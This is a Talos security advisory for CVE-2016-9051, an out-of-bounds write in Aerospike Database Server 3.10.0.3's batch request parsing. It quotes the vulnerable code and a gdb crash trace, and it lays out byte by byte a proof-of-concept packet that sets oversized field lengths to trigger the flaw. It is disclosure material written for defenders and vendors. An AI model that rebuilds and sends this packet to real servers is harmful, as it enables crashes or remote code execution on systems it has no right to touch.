Talos Vulnerability Report

TALOS-2016-0265

Aerospike Database Server Client Batch Request Code Execution Vulnerability

February 21, 2017
CVE Number

CVE-2016-9051

Summary

An exploitable out-of-bounds write vulnerability exists in the batch transaction field parsing functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause an out-of-bounds write resulting in memory corruption which can lead to remote code execution. An attacker can simply connect to the port to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-823 - Use of Out-of-range Pointer Offset

Details

Aerospike Database Server is both a distributed and scalable NoSQL database that is used as a back-end for scalable web applications that need a key-value store. With a focus on performance, it is multi-threaded and retains its indexes entirely in ram with the ability to persist data to a solid-state drive or traditional rotational media.

For handling packets received by a client, the server spawns multiple threads which each execute the thr_demarshal function. When a socket is ready to be read, the server will receive data from the socket and determine the packet’s message type. If it’s protocol type specifies that the packet is compressed (PROTO_TYPE_AS_MSG_COMPRESSED), the server will decompress the contents of the packet with zlib [1] and then continue to process the packet as a type of PROTO_TYPE_AS_MSG. When processing a packet type of PROTO_TYPE_AS_MSG, the server will check some flags within the header and use it to determine what type of request is being made. If one of these flags specifies the AS_MSG_INFO1_BATCH option, the server will pass the packet to the as_batch_queue_task function [2].

as/src/base/thr_demarshal.c:389
void *
thr_demarshal(void *unused)
{
...
    // Demarshal transactions from the socket.
...
        // Iterate over all events.
        for (i = 0; i < nevents; i++) {
...
                // If pointer is NULL, then we need to create a transaction and
                // store it in the buffer.
                if (fd_h->proto == NULL) {
...
                    // Do a preliminary read of the header into a stack-
                    // allocated structure, so that later on we can allocate the
                    // entire message buffer.
                    if (0 >= (n = cf_socket_recv(sock, &proto, sizeof(as_proto), MSG_WAITALL))) {
                        cf_detail(AS_DEMARSHAL, "proto socket: read header fail: error: rv %d sz was %d errno %d", n, sz, errno);
                        goto NextEvent_FD_Cleanup;
                    }
...
                // Check for a finished read.
                if (0 == fd_h->proto_unread) {
...
                    // Check if it's compressed.
                    if (tr.msgp->proto.type == PROTO_TYPE_AS_MSG_COMPRESSED) {  // [1]
...
                    }
...
				// Fast path for batch requests.
				if (tr.msgp->msg.info1 & AS_MSG_INFO1_BATCH) {
					as_batch_queue_task(&tr);                                   // [2]
					goto NextEvent;
				}

Inside the as_batch_queue_task function, the server will first parse the header [1] and then proceed to iterate through all the fields defined in the packet looking for fields with the type AS_MSG_FIELD_TYPE_BATCH or AS_MSG_FIELD_TYPE_BATCH_WITH_SET. If a field with this type is discovered, the function will save it to the bf variable [2]. Later, the server will then process the specific field by reading a uint32_t [3] which is used as the number of records to read from the packet followed by a byte [4] that determines whether the transaction described in the packet is processed in-line or not. The server will then enter a loop to read each record out of the packet.

as/src/base/batch.c:636
int
as_batch_queue_task(as_transaction* btr)
{
...
    // Parse fields
    uint8_t* limit = (uint8_t*)bmsg + bproto->sz;
    as_msg_field* mf = (as_msg_field*)bmsg->data;
    as_msg_field* end;
    as_msg_field* bf = 0;
...
    // Parse header
    as_msg* bmsg = &btr->msgp->msg;
    as_msg_swap_header(bmsg);                                   // [1]

    // Parse fields
...
    for (int i = 0; i < bmsg->n_fields; i++) {
...
        as_msg_swap_field(mf);
        end = as_msg_field_get_next(mf);

        if (mf->type == AS_MSG_FIELD_TYPE_BATCH || mf->type == AS_MSG_FIELD_TYPE_BATCH_WITH_SET) {
            bf = mf;                                            // [2]
        }
        mf = end;
    }
...
    // Parse batch field
    uint8_t* data = bf->data;
    uint32_t tran_count = cf_swap_from_be32(*(uint32_t*)data);  // [3]
    data += sizeof(uint32_t);
...
    uint32_t tran_row = 0;
    uint8_t info = *data++;  // allow transaction inline.       // [4]
...
    while (tran_row < tran_count && data + BATCH_REPEAT_SIZE <= limit) {
        // Copy transaction data before memory gets overwritten.
        in = (as_batch_input*)data;
        tr.from_data.batch_index = cf_swap_from_be32(in->index);
        memcpy(&tr.keyd, &in->keyd, sizeof(cf_digest));
...

Inside the loop, the server will check to see if the repeat boolean is set. If it’s not, the server will proceed to create a cl_msg structure in order to satisfy the batch request made by the client [1]. If the repeat boolean is set, the previous message is reused in order to complete the transaction [2]. It is prudent to note that if the first transaction is set to repeat, an uninitialized transaction will be queued to the server which can cause a denial-of-service condition. After determining that a transaction should be read from the packet, the server will read two uint16_t values to determine the number of fields (n_fields) and number of operations (n_ops) [3] that need to be read.

as/src/base/batch.c:781
    while (tran_row < tran_count && data + BATCH_REPEAT_SIZE <= limit) {
        // Copy transaction data before memory gets overwritten.
        in = (as_batch_input*)data;
        tr.from_data.batch_index = cf_swap_from_be32(in->index);
        memcpy(&tr.keyd, &in->keyd, sizeof(cf_digest));
...
        if (in->repeat) {                                           // [2]
            // Row should use previous namespace and bin names.
            data += BATCH_REPEAT_SIZE;
        }
        else {
            // Row contains full namespace/bin names.
            out = (cl_msg*)data;                                    // [1]

            if (data + sizeof(cl_msg) + sizeof(as_msg_field) > limit) {
                break;
            }
...
            // n_fields/n_ops is in exact same place on both input/output, but the value still
            // needs to be swapped.
            out->msg.n_fields = cf_swap_from_be16(in->n_fields);    // [3]

            // Older clients sent zero, but always sent namespace.  Adjust this.
            if (out->msg.n_fields == 0) {
                out->msg.n_fields = 1;
            }

            out->msg.n_ops = cf_swap_from_be16(in->n_ops);          // [3]

After reading the number of fields and the number of operations, the server will iterate through the packet calling as_msg_swap_field [1] for each field, and set a flag if a field is of the type AS_MSG_FIELD_TYPE_SET [1]. To seek to the next field within the packet, the server will call as_msg_field_get_next [2]. This function will simply read a uint32_t out of the packet as a size and add it to the pointer that is provided as the argument. Due to a missing bounds check within the loop, the call to this function can seek the mf variable outside the bounds of the packet at which point the next iteration of the as_msg_swap_field call can flip the byte-order for the size. This can cause memory corruption which can lead to code execution under the context of the server. Immediately after processing off the transaction operations within the packet, the server correctly checks to see if any seeking causes the op variable to be seeked out-of-bounds [3]. This is done for both the as_msg_op structure itself and when using the size defined within to seek to the next operation.

as/src/base/batch.c:827
            mf = as_msg_field_get_next(mf);

            // Swap remaining fields.
            for (uint16_t j = 1; j < out->msg.n_fields; j++) {
                if (mf->type == AS_MSG_FIELD_TYPE_SET) {
                    as_transaction_set_msg_field_flag(&tr, AS_MSG_FIELD_TYPE_SET);
                }

                as_msg_swap_field(mf);                      // [1]
                mf = as_msg_field_get_next(mf);             // [2]
            }

            data = (uint8_t*)mf;
...
            if (out->msg.n_ops) {
                // Bin names input is same as transaction ops, so just leave in place and swap.
                uint16_t n_ops = out->msg.n_ops;
                for (uint16_t j = 0; j < n_ops; j++) {
                    if (data + sizeof(as_msg_op) > limit) { // [3]
                        goto TranEnd;
                    }
                    op = (as_msg_op*)data;
                    as_msg_swap_op(op);
                    op = as_msg_op_get_next(op);
                    data = (uint8_t*)op;

                    if (data > limit) {                     // [3]
                        goto TranEnd;
                    }
                }
            }

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`

...
(gdb) c
Continuing.
[Switching to Thread 0x7f7463fff700 (LWP 13293)]

Catchpoint 4 (signal SIGSEGV), 0x00000000004b8527 in as_batch_queue_task (
    btr=0x7f7463ffb930) at base/batch.c:831
831                                     if (mf->type == AS_MSG_FIELD_TYPE_SET) {

(gdb) x/i $pc
=> 0x4b8527 <as_batch_queue_task+2823>: movzbl 0x4(%rax),%ecx

(gdb) i r $rax
rax            0x7f75580c410e   0x7f75580c410e

(gdb) db data L0x10
7f74580c410b | ff ff ff ff 01 ff ff ff ff 01 00 00 00 00 00 00 | ................

(gdb) p *(as_msg_field*)data
$7 = {field_sz = 0xffffffff, type = 0x1, data = 0x7f74580c4110 "\377\377\377\377\001"}

(gdb) p data + ((as_msg_field*)data)->field_sz + sizeof(((as_msg_field*)0)->field_sz)
$26 = (uint8_t *) 0x7f75580c410e <Address 0x7f75580c410e out of bounds>

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this is only provided to the vendor), simply extract and run it as follows:

$ python poc hostname:3000
Trying to connect to hostname:3000
Sending 0x73 byte packet... done.

A client packet for Aerospike server has the following structure. The first 2 bytes describe the protocol version and the protocol type. The version must be 0x02, where the protocol type can be one of two values. If AS_COMPRESSED_MSG(0x04) is specified, then the contents of data are zlib-encoded. Otherwise, the AS_MSG(0x03) value is used. The size of this data is defined by the sz field which is a 48-bit unsigned integer.

<class aspie.as_proto_s>
[0] <instance aspie.proto_version 'version'> v2(0x2)
[1] <instance aspie.proto_type 'type'> AS_MSG(0x3)
[2] <instance uint48_t 'sz'> +0x00000000006b (107)
[8] <instance aspie.as_msg_s 'data'> "\x00\x08\x00\x00\x00\x00\x00  ..skipped ~87 bytes.. \x00\x00\x00\x00\x00\x00\x00"

The contents of the data field has the following structure. In order to submit a batch message, a flag needs to be specified in the info1 field. When the fourth bit is set (0x08) the packet is representing a batched transaction that intended to be queued. After this flag is set, the number of protocol fields is specified in n_fields.

<class aspie.as_msg_s> 'data'
[8] <instance uint8_t 'header_sz'> +0x00 (0)
[9] <instance aspie.AS_MSG_INFO1 'info1'> bits=8} (0x08, 8) BATCH
[a] <instance aspie.AS_MSG_INFO2 'info2'> bits=8} (0x00, 8)
[b] <instance aspie.AS_MSG_INFO3 'info3'> bits=8} (0x00, 8)
[c] <instance uint8_t 'unused'> +0x00 (0)
[d] <instance uint8_t 'result_code'> +0x00 (0)
[e] <instance uint32_t 'generation'> +0x00000000 (0)
[12] <instance uint32_t 'record_ttl'> +0x00000000 (0)
[16] <instance uint32_t 'transaction_ttl'> +0x00000000 (0)
[1a] <instance uint16_t 'n_fields'> +0x0002 (2)
[1c] <instance uint16_t 'n_ops'> +0x0000 (0)
[1e] <instance array(aspie.as_msg_field_s,2) 'fields'> aspie.as_msg_field_s[2] "\x00\x00\x00\x01\x00\x00\x00  ..skipped ~65 bytes.. \x00\x00\x00\x00\x00\x00\x00"
[73] <instance array(aspie.as_msg_op_s,0) 'ops'> aspie.as_msg_op_s[0] ""

The provided proof-of-concept sends a packet with two fields encoded within. Each field will begin with a 32-bit size. This size includes the number of bytes that represent the type as well as the contents of the data field. The two field types that are required are the NAMESPACE(0x0) type and the BATCH(0x29) type. The NAMESPACE(0x0) type simply contains an ascii-encoded string describing the namespace to query within the data field.

<class aspie.as_msg_field_s> '0'
[1e] <instance uint32_t 'field_sz'> +0xXXXXXXXX (X)
[22] <instance aspie.AS_MSG_FIELD_TYPE 'type'> NAMESPACE(0x0)
[23] <instance aspie.as_msg_namespace_s<char_t> 'data'> ...

<class aspie.as_msg_field_s> '1'
[23] <instance uint32_t 'field_sz'> +0x0000004c (76)
[27] <instance aspie.AS_MSG_FIELD_TYPE 'type'> BATCH(0x29)
[28] <instance aspie.as_msg_batch_s 'data'> "\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

The BATCH(0x29) field has the following structure. The tran_count variable describes the number of transactions that are within. The provided proof-of-concept includes two transactions of which only one is required. The info byte that follows describes whether the transaction should be executed in-line or queued for later and does not affect the triggering of this vulnerability.

<class aspie.as_msg_batch_s> 'data'
[28] <instance uint32_t 'tran_count'> +0x00000002 (2)
[2c] <instance uint8_t 'info'> +0x00 (0)
[2d] <instance aspie.as_batch_input 'transactions'> aspie.transaction[2] "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

Each transaction begins with a 25-byte header. The last byte of this header represents which type of transaction record is described. If it is set to 0x01, then a repeat record is used otherwise an actual ‘as_msg_s’ structure within the packet. The vulnerability described in this advisory revolves around the fields described within an embedded ‘as_msg_s’ packet and so, as a result, the 25th byte of the header must be defined as 0x00. The first batch transaction and it’s header is as follows.

<class aspie.transaction> '0'
[2d] <instance aspie._header 'header'> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
[46] <instance aspie.as_batch_msg 'msg'> "\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01"

<class aspie.as_batch_repeat> 'rpt'
[0] <instance uint32_t 'index'> +0x00000000 (0)
[4] <instance aspie.cf_digest 'keyd'> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
[18] <instance uint8_t 'repeat'> +0x00 (0)

Due to the repeat byte in the header being 0x00, the structure at offset 0x2d of the packet contains an as_msg_s type. When processing this type encoded within a BATCH(0x29) field, the transaction header is encoded as a truncated as_msg_s type and has the following format. The contents of proto and trunc(msg) are mostly ignored by Aerospike Server.

<class aspie.as_batch_msgtrunc> 'msg'
[0] <instance aspie.as_batch_proto_s 'proto'> "\x00\x00\x00\x00\x00\x00\x00\x00"
[8] <instance aspie.as_batch_msg_s 'trunc(msg)'> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.as_batch_proto_s> 'proto'
[0] <instance aspie.proto_version 'version'> v0(0x0)
[1] <instance aspie.proto_type 'type'> +0x00 (0)
[2] <instance uint48_t 'sz'> +0x000000000000 (0)

<class aspie.as_batch_msg_s> 'trunc(msg)'
[8] <instance uint8_t 'header_sz'> +0x00 (0)
[9] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x00, 8)
[a] <instance aspie.AS_MSG_INFO2 'info2'> {bits=8} (0x00, 8)
[b] <instance aspie.AS_MSG_INFO3 'info3'> {bits=8} (0x00, 8)
[c] <instance uint8_t 'unused'> +0x00 (0)
[d] <instance uint8_t 'result_code'> +0x00 (0)
[e] <instance uint32_t 'generation'> +0x00000000 (0)
[12] <instance uint32_t 'record_ttl'> +0x00000000 (0)
[16] <instance uint_t 'trunc(transaction_ttl)'> +0x0000 (0)
[18] <instance uint8_t 'repeat'> +0x00 (0)

At offset 0x46 of the packet produced by the proof-of-concept is the truncated data of the as_msg_s structure. This structure begins with the info1 byte and is followed by two fields, n_fields and n_ops, which describe the number of fields that follow. Due to an assumption made by the server, there must be at least two fields within this structure to reach this vulnerability.

<class aspie.as_batch_msg> 'msg'
[46] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x00, 8)
[47] <instance uint16_t 'n_fields'> +0x0002 (2)
[49] <instance uint16_t 'n_ops'> +0x0000 (0)
[4b] <instance dynamic.array(aspie.as_msg_field_s,2) 'fields'> aspie.as_msg_field_s[2] "\xff\xff\xff\xff\x01\xff\xff\xff\xff\x01"
[55] <instance dynamic.array(aspie.as_msg_op_s,0) 'ops'> aspie.as_msg_op_s[0] ""

Despite the two fields in the msg field being of the type SET(0x1), the type field does not affect the vulnerability. The vulnerability exists due to the application not checking if the field_sz of each field in msg will seek the pointer outside the bounds of the packet data. If the aggregate sum of all of the field_sz uint32_t’s in each msg field is larger than the bounds of the packet (which can be determined by looking at the uint48_t, sz, at offset 2 of the packet), then this vulnerability is being triggered. The provided proof-of-concept sets both of these lengths to the largest possible uint32_t.

<class aspie.as_msg_field_s> '0'
[4b] <instance uint32_t 'field_sz'> +0xffffffff (4294967295)
[4f] <instance aspie.AS_MSG_FIELD_TYPE 'type'> SET(0x1)
[50] <instance aspie.as_msg_namespace_s<char_t> 'data'> u''

<class aspie.as_msg_field_s> '1'
[50] <instance uint32_t 'field_sz'> +0xffffffff (4294967295)
[54] <instance aspie.AS_MSG_FIELD_TYPE 'type'> SET(0x1)
[55] <instance aspie.as_msg_namespace_s<char_t> 'data'> u''

Timeline

2016-12-23 - Vendor Disclosure
2017-02-21 - Public Release

Credit

Discovered by the Cisco Talos Team